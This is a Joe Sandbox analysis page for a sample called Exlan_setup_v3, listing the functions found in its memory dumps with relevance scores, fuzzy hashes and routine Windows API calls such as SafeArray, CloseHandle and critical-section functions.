Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 336b879f3a6aa99df4a462fae065e98d85ba3f7e2f5cc9393aec0f2128501d61
Instruction ID: c01224f4f1442323b57517709a52ec6fb72aa9480c583a92da966703a3046d77
Opcode Fuzzy Hash: 336b879f3a6aa99df4a462fae065e98d85ba3f7e2f5cc9393aec0f2128501d61
Instruction Fuzzy Hash: 1941387570521AAFDB04DFA8C880EAF77B8EF49354F208659F911DB680D731E941CBA1

Function 6CFBDFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CFBDFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFBE003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFBE02F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 9bf1b42480e107044541c6885061a3f5343ce520530fc5134d12d5cede72ec87
Instruction ID: e181894ed3a06eeee5031ba96929b9ff6c5e71b7ffc1d4ad9aeea51791cf1001
Opcode Fuzzy Hash: 9bf1b42480e107044541c6885061a3f5343ce520530fc5134d12d5cede72ec87
Instruction Fuzzy Hash: AA415276A01109DFCB10DFA9C8C4EAEB7B5FF49354B2046A9E526E7390C731AD41CB90

Function 6CFAF9E0 Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CFAFA1A

Part of subcall function 6CFAFC30: UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,5A45ABCE), ref: 6CFAFC98
Part of subcall function 6CFAFC30: CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,5A45ABCE), ref: 6CFAFCAD
Part of subcall function 6CFAFC30: CloseHandle.KERNEL32(?,?,?,00000000,5A45ABCE), ref: 6CFAFCB7
Part of subcall function 6CFAFC30: SetLastError.KERNEL32(00000000,?,?,00000000,5A45ABCE), ref: 6CFAFCBA

std::tr1::_Xweak.LIBCPMT ref: 6CFAFA5B
std::tr1::_Xweak.LIBCPMT ref: 6CFAFA80

Part of subcall function 6CFAFDE0: UnmapViewOfFile.KERNEL32(?,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE2D
Part of subcall function 6CFAFDE0: CloseHandle.KERNEL32(?,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE43
Part of subcall function 6CFAFDE0: CloseHandle.KERNEL32(00000000,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE4E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CloseHandle$FileUnmapViewXweakstd::tr1::_$ErrorLast_memset
String ID:
API String ID: 7609987-0
Opcode ID: fbf0bcc44d282afb314b4f0bd6731ed28038cc80828af057afd769f4145e043c
Instruction ID: b1d4dbe6a0e20e581837f6b123b7fe2b51c616b96b707150dcb816d1deaf6ef3
Opcode Fuzzy Hash: fbf0bcc44d282afb314b4f0bd6731ed28038cc80828af057afd769f4145e043c
Instruction Fuzzy Hash: 8D31D331A45109EFDF48CFA8C450BEDF3B9AF0530CF148248E8259B791D775AA0ACB90

Function 6CFBD920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CFBD949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CFBD96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBD9CF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: b1a3f88feb653f67c58e7ee59570ac498e553706da5dcba1cdd5331c806913ac
Instruction ID: 7f367a6939236ba8ce50a8f47031af3a1afe10793d6d5ce7ab3fd4096fbbf525
Opcode Fuzzy Hash: b1a3f88feb653f67c58e7ee59570ac498e553706da5dcba1cdd5331c806913ac
Instruction Fuzzy Hash: 7E216D35601215AFEB11CF99CC84FAB77B8EF8A744F244198E945EB288D771D901CBA2

Function 6CFCDB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCDB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFCDB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFCDBA2

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 46175623142c9b2a9bfe37581b13d7e6b69b56c0e278b132346301313c641513
Instruction ID: af4ad0531e2b38c9e32daf48e7bce4d81dddcd0b3582d13be0c4cc178bf2c8ba
Opcode Fuzzy Hash: 46175623142c9b2a9bfe37581b13d7e6b69b56c0e278b132346301313c641513
Instruction Fuzzy Hash: B9119075786205AFD700DF69C889F9ABBB8FF6A315F148199E908DB341D730E801CBA1

Function 6CFAFDE0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE2D
CloseHandle.KERNEL32(?,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE43
CloseHandle.KERNEL32(00000000,?,00000000,6CFAFA73,?,5A45ABCE), ref: 6CFAFE4E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: af1a61244a05f9621fdd571d7f6fb5b447f77f6fcd2e52a56f6cd1b83e0453ce
Instruction ID: 0c43e0940919297205f5aa6c272ff0989eeaa35a27a212b8c641be5adb05cbd0
Opcode Fuzzy Hash: af1a61244a05f9621fdd571d7f6fb5b447f77f6fcd2e52a56f6cd1b83e0453ce
Instruction Fuzzy Hash: B8012D71A84201DEDB50CAF6D8D0BC7F3B95B95318B29591AD4858B912D334DC83CB10

Function 6CFB6C60 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CFB6C73
SafeArrayAccessData.OLEAUT32(00000000,6CFB6C3C), ref: 6CFB6C87
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CFB6CA3

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector
String ID:
API String ID: 3963895280-0
Opcode ID: e131fdcb599454c9cce0777d62e8863b965c641cadfb9c00c31c6512ff579e3a
Instruction ID: c4a54dcf51ee3efee80408e71443928c918c87d5fae547d3f9f71953e9f0bd8c
Opcode Fuzzy Hash: e131fdcb599454c9cce0777d62e8863b965c641cadfb9c00c31c6512ff579e3a
Instruction Fuzzy Hash: FAF0FE76205214BBEB105F52DC8AF977BACEF9A765F118015FA188B284E770D5009BA1

Function 6CFB62C0 Relevance: 3.3, APIs: 2, Instructions: 263COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFB6466

Part of subcall function 6D009533: std::exception::_Copy_str.LIBCMT ref: 6D00954E

__CxxThrowException@8.LIBCMT ref: 6CFB647D

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: e630400d348dd18064af9009de47598371fa74cf9cc6f8eb49b4a82b8e7ff923
Instruction ID: 3a5a48b235a0ada3b1b5293d5238313083ac5d220f2214472d5cf2f4660f4a46
Opcode Fuzzy Hash: e630400d348dd18064af9009de47598371fa74cf9cc6f8eb49b4a82b8e7ff923
Instruction Fuzzy Hash: 019199B1809304AFE704CF9AD981B9ABBF4FF44744F15896EF909AB790D371D9048B92

Function 6CFD3690 Relevance: 3.1, APIs: 2, Instructions: 144COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CFD36E3
_malloc.LIBCMT ref: 6CFD37BB

Part of subcall function 6D009D2C: RtlFreeHeap.NTDLL(00000000,00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D42
Part of subcall function 6D009D2C: GetLastError.KERNEL32(00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D54

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ErrorFreeHeapLast_malloc_memset
String ID:
API String ID: 3118926292-0
Opcode ID: 06cd03137dd8950bc80030055b275f0eb317201547ca959b20dc1edb2e00b09c
Instruction ID: 617550572ac6888024514aeec7e0649f7ef26fa8389509be05b3f0556049b9de
Opcode Fuzzy Hash: 06cd03137dd8950bc80030055b275f0eb317201547ca959b20dc1edb2e00b09c
Instruction Fuzzy Hash: CE4149B56086019FD700CF28C880E6BB7F8EF89718F1A4959FA8597340D775ED098BA2

Function 6CFCD2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFCD3E8
__CxxThrowException@8.LIBCMT ref: 6CFCD3FF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: d1e9d63a5f0f1db75eb7afca97e1a21ff344b14a7e0e2aa55b96936efd4c7696
Instruction ID: d1f462e16d6fc4d066d20d4fcf350a4bb8d8fd0ffd847599a4c98e39a998e678
Opcode Fuzzy Hash: d1e9d63a5f0f1db75eb7afca97e1a21ff344b14a7e0e2aa55b96936efd4c7696
Instruction Fuzzy Hash: 84315B716097059FD704CF29D880A9EBBF4BF89314F608A2EF4558B750E731E906CB92

Function 05805948 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 058060F9
4'^q, xrefs: 05806109

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 8ea4cef7c913003158decbcaddb79b71739ee7f8ca54a2abf6219a9ab6f87599
Instruction ID: a3399d9f42585243d5f617f1dbb8d38101b5c9af935c8a10fba933a591a1f5aa
Opcode Fuzzy Hash: 8ea4cef7c913003158decbcaddb79b71739ee7f8ca54a2abf6219a9ab6f87599
Instruction Fuzzy Hash: CA42D574E0420DCFDBA4DB98D898ABEBBB2BF49314F509025D912AB394D7345C86CF60

Function 6CFB8400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFB8449
__CxxThrowException@8.LIBCMT ref: 6CFB845E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: a6f84c3b78de490892a7e9cda80d1d397aed901b20ba2d8fae4c4260aef6be74
Instruction ID: 519b2846713b0a7cc341f384cac669975ad92fe9e1aff4d1ccea3826d04b2f14
Opcode Fuzzy Hash: a6f84c3b78de490892a7e9cda80d1d397aed901b20ba2d8fae4c4260aef6be74
Instruction Fuzzy Hash: E501AF74904208AFE708DF55E490DAABBB5EF98300B65C1AED92A4B750DB30EA04CB91

Function 6D009D2C Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D42

Part of subcall function 6D00D7D8: __getptd_noexit.LIBCMT ref: 6D00D7D8

GetLastError.KERNEL32(00000000,?,6D00EAD7,00000000,?,?,6D00D7DD,6D009DEF,00000000), ref: 6D009D54

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ErrorFreeHeapLast__getptd_noexit
String ID:
API String ID: 269751013-0
Opcode ID: 238894696fd11595cd7aa450aa3282bb46b27c5654d9e36e30875fb9a5bdd075
Instruction ID: f947c6c42314ba12a347da6decf2f35498a8dca896277a370e929ba7e3a59bf6
Opcode Fuzzy Hash: 238894696fd11595cd7aa450aa3282bb46b27c5654d9e36e30875fb9a5bdd075
Instruction Fuzzy Hash: 89E08C32404304BBFB202FA0E808FAD3BFCAB4535AF240025F60C96460EB30C490CBA4

Function 05806470 Relevance: 2.9, Strings: 2, Instructions: 362COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05806906
4'^q, xrefs: 05806916

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 76ed57f830dbce453dcbf1cf8ef8ac0da1ee373a6468b498b5895e9f59cdc6b7
Instruction ID: 4cc651ef296b0af321b903ab1b066629af257045f7deaec258c79a3589d82063
Opcode Fuzzy Hash: 76ed57f830dbce453dcbf1cf8ef8ac0da1ee373a6468b498b5895e9f59cdc6b7
Instruction Fuzzy Hash: CDF1E274D01218DFCBA8DFA5E8986ACBBB2FF49315F209429E816A7390DB355C95CF00

Function 05802258 Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

TJcq, xrefs: 05802336
PO^q, xrefs: 0580230C

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: PO^q$TJcq
API String ID: 0-3011750398
Opcode ID: ddb331cda50595dcd87d309a3436d24fe1f4b66f286d5d0523d4f0f9315ae09a
Instruction ID: 62931e7d67bdb20a1cfd1641faf7005a36189263f98f788929e274f49e332579
Opcode Fuzzy Hash: ddb331cda50595dcd87d309a3436d24fe1f4b66f286d5d0523d4f0f9315ae09a
Instruction Fuzzy Hash: 79413B31B04205AFC744DF68D854AAEBBF6EFC9310F1184A9E406DB3A1DF74AD058B95

Function 6CFB8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6CFB8C13,?,6CFB8CD3,?,6CFB8C13,00000000,?,?,6CFB8C13,?,?), ref: 6CFB8D73
LeaveCriticalSection.KERNEL32(?,?,?,6CFB8CD3,?,6CFB8C13,00000000,?,?,6CFB8C13,?,?), ref: 6CFB8D8C

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3442e17689d8e1fca1495f8ade65d0b648f098c2a74cd2ef7cad657f2bda0aab
Instruction ID: 66b27bdd6c8081f3455bde619ff20d8287597b5bcac3baff3838a7fb6a4afd63
Opcode Fuzzy Hash: 3442e17689d8e1fca1495f8ade65d0b648f098c2a74cd2ef7cad657f2bda0aab
Instruction Fuzzy Hash: 6121F87520010AEF8B04DF89D890DAEB3BAFFC9314B148549F90697750CB31EE16CBA1

Function 6CFB8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6CFB6890,?), ref: 6CFB8BDD
LeaveCriticalSection.KERNEL32(?), ref: 6CFB8C23

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

